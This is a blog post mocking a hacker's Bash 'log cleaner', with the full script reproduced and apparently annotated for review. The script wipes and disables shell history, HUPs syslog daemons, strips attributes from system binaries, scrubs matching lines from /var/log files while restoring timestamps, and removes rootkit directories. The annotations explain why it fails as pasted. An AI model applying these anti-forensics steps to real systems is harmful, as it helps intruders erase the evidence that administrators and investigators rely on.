Sunday, August 18, 2013

Terrible code - produced by xd!

Just to show you how bad xd's code is..

http://valhalla.allalla.com/2013/08/sabre-bash-log-cleaner-haqnet/

Of course, knowing this idiot, we guessed the password (1st try, lol..), so, the password is: haqnet

TL;DR: this 'cleaner' HUPs every syslog daemon it can name, rewrites the files under /var/log (and /var/log/security) with the lines matching its single argument stripped out, appends history-disabling lines to /root/.bash_profile and runs chattr -R over /bin, /sbin and friends <-- xd's definition of stealth, LOL

The code is hideous, and from the look of it it won't really work either: the outer for loop is never closed, the second loop moves the wrong temp file, and several of the grep filters are unmatched '[' patterns that make grep bail out. It also attempts to remove ancient kits such as tuxkit, since 2002-era boxes are the only thing xd is capable of pwning with his Romanian 0day scripts [more on that soon]. We do not recommend anyone use this piece of shit.

Thanks for reading.

#!/bin/sh
# NOTE(review): anti-forensics "log cleaner" exactly as pasted on the blog,
# kept verbatim for analysis. The comments added below describe what each step
# does and which artifacts it leaves behind. The listing itself is blog-mangled:
# typographic quotes (’ “ ”) replace ASCII quotes on several lines, and the ESC
# byte in front of each "[1;3Xm" colour code appears to have been stripped, so
# it does not run as shown. The shebang is /bin/sh, but the script relies on
# bash-only builtins further down (history, let).
# SABRE – BASH BASED LOGCLEANER (Based on Sauber so a befitting name)
# Usage: sauber <string>
# NOTE: Feel free to change/edit or update this and send it back to us admin@crazycoders.com !
#       Remeber,this WONT do your job completely for you,and i DID leave out some kits,this
#       kit-remover was borrowed then updated due to times-a-changin ,enjoi
#       or hit us up on irc.haqnet.net (SSL-ONLY) Port 31337 join #Haqnet // CrazyCODERS.COM // [HaqNET]
#########################################################################################################

# SIGKILL to pid "-0", i.e. process group 0 = the caller's own process group.
# NOTE(review): on bash under job control this kills the script itself (and,
# without job control, possibly the invoking shell) before anything below has
# run; the intent is unclear — verify on the target shell.
kill -9 -0

# ANSI colour escapes for the progress output. As pasted, the opening quote on
# BLK is a typographic ’ while the closing one is ASCII ', so the quoting of
# this whole run is mismatched in the listing.
BLK=’ [1;30m'
RED=' [1;31m'
GRN=' [1;32m'
YEL=' [1;33m'
BLU=' [1;34m'
MAG=' [1;35m'
CYN=' [1;36m'
WHI=' [1;37m'
DRED=' [0;31m'
DGRN=' [0;32m'
DYEL=' [0;33m'
DBLU=' [0;34m'
DMAG=' [0;35m'
DCYN=' [0;36m'
DWHI=' [0;37m'
RES=' [0m'

# Progress banner (the closing quote is a typographic ” in the paste).
echo "[+] ${BLK}* ${DWHI}Cleaning the mess.. may take some time depenz on size of the logs.${RES}”
# Append history-disabling lines to root's .bash_profile and to .bash_profile
# in the current working directory. This only takes effect on the *next* login
# of whoever sources those files, and it is a durable, easy-to-spot
# modification (content and mtime of /root/.bash_profile change). Bash has no
# HISTSAVE variable; only the HISTFILE line does anything.
echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
# These unset the script's *own* environment only. The operator's interactive
# shell still has HISTFILE set and writes its history at exit unless the script
# is sourced rather than executed.
unset HISTFILE
unset HISTSAVE
# HUP every syslog daemon name the author could think of (forces them to reopen
# their files), plus every perl and logger process. "2323" is treated as a
# process *name* by killall and as a PID by kill; a hard-coded PID means nothing
# on any other box.
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
# Clears the in-memory history list of this non-interactive shell (which never
# accumulated one); the invoking shell is unaffected.
history -c
# Remove the history files in the current directory and in /root, then try to
# replace them with symlinks to /dev/null. ln takes TARGET then LINK_NAME, so
# with GNU ln (which permutes -s) these try to create a link *at* /dev/null
# pointing to .bash_history; /dev/null already exists, so no link is created.
# Note that wtmp/utmp/lastlog are never touched anywhere in this script (they
# are explicitly excluded by the greps below).
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
# Recursively strip every ext attribute (append-only, immutable, secure-delete,
# ...) from the system binary directories. Needs root and — on ext filesystems,
# as far as I can tell — bumps the ctime of every inode it touches, which is a
# loud forensic signal rather than stealth.
chattr -R -ASacdisu /sbin /bin /usr/bin/ /usr/sbin/ /usr/local/bin/ /usr/local/sbin/

# Build the list of /var/log files to scrub by parsing `ls` output (long format
# because of -l/-o) and then excluding, line by line, a grab-bag of substrings:
# the ls -F markers (/ directory, * executable, @ symlink), rotated archives
# (.gz/.tgz/.tar), the binary login records (lastlog, utmp, wtmp — these are
# therefore never cleaned), the author's own tool/output file names, generic
# fragments such as "ss" (which also drops /var/log/messages) and the bracket
# expression "[SSH]" (matches any line containing an S or an H).
# NOTE(review), as pasted:
#  (1) "[LOG*", "[SEC*", "[IPFW*" and "[IPTABL*" are unmatched brackets; GNU
#      grep rejects them ("Unmatched [") and exits 2 with no output, so the
#      pipeline yields nothing and WERD ends up empty even with sane quoting.
#  (2) The pipeline is split by blank lines and several patterns use typographic
#      quotes, so the lines after the first blank are parsed as separate
#      commands rather than as part of this substitution.
#  (3) Each surviving line is a full long-listing line, and the unquoted
#      `for fil in $WERD` below word-splits it into mode/links/owner/size/date/
#      name fields — none of which is a usable filename on its own.
WERD=$(/bin/ls -Faloh /var/log | grep -v “lastlogin” | grep -v “/” | grep -v “*” | grep -v “.tgz” | grep -v “.gz” | grep -v “.tar” | grep -v “lastlog” | grep -v “utmp” | grep -v

“wtmp” | grep -v “vtmp” | grep -v “xtmp” | grep -v “@” | grep -v “.txt” | grep -v “b.pl” | grep -v “scan.txt” | grep -v “.txt.php” | grep -v “.php.gif” | grep -v “mfu.txt” |

grep -v “bios.txt” | grep -v “sort” | grep -v “ips” | grep -v “ipsort” | grep -v “a.txt” | grep -v “IRC” | grep -v “[SSH]” | grep -v “scan.txt” | grep -v “mis.php” | grep -v

“php://input” | grep -v “got root”| grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep -v

"byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

# Same filter applied to /var/log/security (a BSD-style path, not a standard
# Linux log directory), with the same three defects as above.
WERDZ=$(/bin/ls -Faloh /var/log/security | grep -v "lastlogin" | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp"

| grep -v "wtmp" | grep -v "vtmp" | grep -v "xtmp" | grep -v "@" | grep -v ".txt" | grep -v "b.pl" | grep -v "scan.txt" | grep -v ".txt.php" | grep -v ".php.gif" | grep -v

"mfu.txt" | grep -v "bios.txt" | grep -v "sort" | grep -v "ips" | grep -v "ipsort" | grep -v "a.txt" | grep -v "IRC" | grep -v "[SSH]” | grep -v “scan.txt” | grep -v “mis.php” |

grep -v “php://input” | grep -v “got root” | grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep

-v "byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

# Per-file scrub loop over /var/log. NOTE(review): this `for` is never closed —
# the `#done` below is commented out and the only `done` that follows belongs
# to the inner /var/log/security loop. The shell reads to end-of-file looking
# for the matching `done`, reports a syntax error, and executes *nothing* from
# here on (a compound command is parsed in full before any of it runs). The
# comments below describe what was intended, not what happens.
for fil in $WERD
do
# Line count before scrubbing (wc prints "N path"; awk keeps N).
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}..${RES}"
# Drop every line matching the single positional argument (unquoted: an empty
# $1 makes grep take the log path as its pattern and block on stdin), write the
# remainder to ./new, copy the original's timestamps onto it, then swap it in.
# touch -r restores atime/mtime only; mv replaces the inode, so the scrubbed log
# carries a fresh ctime (and the owner/mode of the temp file rather than of the
# original) — comparing ctime against mtime exposes it.
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
# Lines removed = before - after (`let` is a bash builtin, not POSIX sh).
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
#echo "${WHI}$linedel ${DWHI}lines removed: [/var/log] ${RES} ..”
#done
# Same procedure for /var/log/security. NOTE(review): the filtered copy is
# written to ./newx but the `mv` below moves ./new — the leftover from the outer
# iteration — so the security log would be replaced with the wrong file's
# contents and newx would be left behind in the working directory. The awk
# quotes on these lines are typographic in the paste.
for filz in $WERDZ
do
linex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
echo -n “${BLK}* ${DWHI}Cleaning ${WHI}$filz ($linex ${DWHI}lines${WHI})${BLK}..${RES}”
grep -v $1 /var/log/security/$filz > newx
touch -r /var/log/security/$filz newx
mv -f new /var/log/security/$filz
newlinex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
let linedel=$(($linex-$newlinex))
echo “${WHI}$linedel ${DWHI}lines removed: [/var/log/security] ${RES} ..”
done

##remove known rootkits
# ${C1} and ${E} are never assigned anywhere in this script, so they expand to
# nothing.
echo “${C1}#${E} Checking for kitZ ..”
# Each block removes a known early-2000s rootkit install directory if present,
# plus anything else matching the glob.
if [ -d "/dev/tuxkit" ]; then
rm -rf /dev/tuxkit
rm -rf /dev/tux*
fi
if [ -d "/dev/fdg" ]; then
rm -rf /dev/fdg
rm -rf /dev/fdg*
fi
if [ -d "/dev/.hijackerz" ]; then
rm -rf /dev/.hijackerz
rm -rf /dev/.hijack*
fi
# For .puta the loader line is also filtered out of /root/.bash_profile through
# a fixed-name temp file in /tmp (predictable name in a world-writable directory
# — a classic symlink target when run as root). touch -acmr copies atime and
# mtime from the original; as above, the inode and ctime still change.
if [ -d "/usr/src/.puta" ]; then
rm -rf /usr/src/.puta
rm -rf /usr/src/.puta*
grep -v /usr/src/.puta /root/.bash_profile > /tmp/.lock-01002231292
touch -acmr /root/.bash_profile /tmp/.lock-01002231292
mv -f /tmp/.lock-01002231292 /root/.bash_profile
rm -f /tmp/.lock-01002231292
rm -f /tmp/.lock-010022*
fi

# Second, verbatim copy of the history/syslog block from the top of the script.
# As there: the appended lines only matter on the next login, the unsets affect
# only this process, "2323" is a meaningless hard-coded name/PID, and the ln
# argument order is reversed so no /dev/null symlink is actually created.
echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
# Final banner (typographic quotes in the paste).
echo “[!] ${BLK}* ALL Done -> exiting ..”
